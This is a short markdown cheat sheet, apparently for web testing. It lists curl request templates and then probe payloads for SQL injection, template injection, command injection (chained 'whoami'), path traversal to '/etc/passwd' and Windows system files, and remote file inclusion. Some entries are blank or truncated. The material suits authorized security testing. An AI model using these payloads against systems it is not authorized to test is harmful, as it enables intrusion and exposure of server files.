# APIs and Fields ## Simulating Requests #### GET ``` curl ``` #### HEAD ``` curl -I ``` #### PUT ``` curl -T http://www.upload.com/myfile ``` #### GET - Params ``` curl ?field=value&field2=value2 ``` #### GET - Follow Redirect ``` curl -L ``` #### GET - Custom Headers ``` curl -H "header1: value" -H "header2: value" ``` #### GET - Custom Cookies ``` curl -b "name1=value1; name2=value2" ``` #### POST - Form Data ``` curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "key1=value1&key2=value2" ``` #### POST - JSON ``` curl -X POST -H 'Content-Type: application/json' -d '{"field1":"value1","field2":"value2"}' ``` #### POST - Send File ``` curl -X POST -d @ curl -X POST -F @ #as form encoded curl -X POST --data-binary @ #use this if file is corrupted ``` #### POST - Base Auth ``` curl -X POST --user ":" curl -X POST -H "Authorization: Basic $(echo -n ":" | base64)" curl -X POST -H "Authorization: Bearer " ``` ## Testing parameters #### SQL Injection ``` '"`) or 'a' = 1; '"` or 1 = 1; sleep(5)# or sleep(5)# ;waitfor delay '0:0:5'-- " or pg_sleep(5)-- ``` #### XSS ```

`"'>

``` #### Template Injection ``` 4*4 {{4*4}} ${4*4} {4*4} <%= 4*4 %> ``` #### RCE ``` os.system('') T(java.lang.Runtime).getRuntime().exec(""); echo exec(""); echo ``; whoami $(whoami) ;whoami ||whoami &&whoami ``` #### Local File Inclusion ``` ../../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\..\Windows\system.ini ..\..\..\..\..\..\..\..\..\boot.ini ``` #### Remote File Inclusion ``` http://www.google.com http:// ```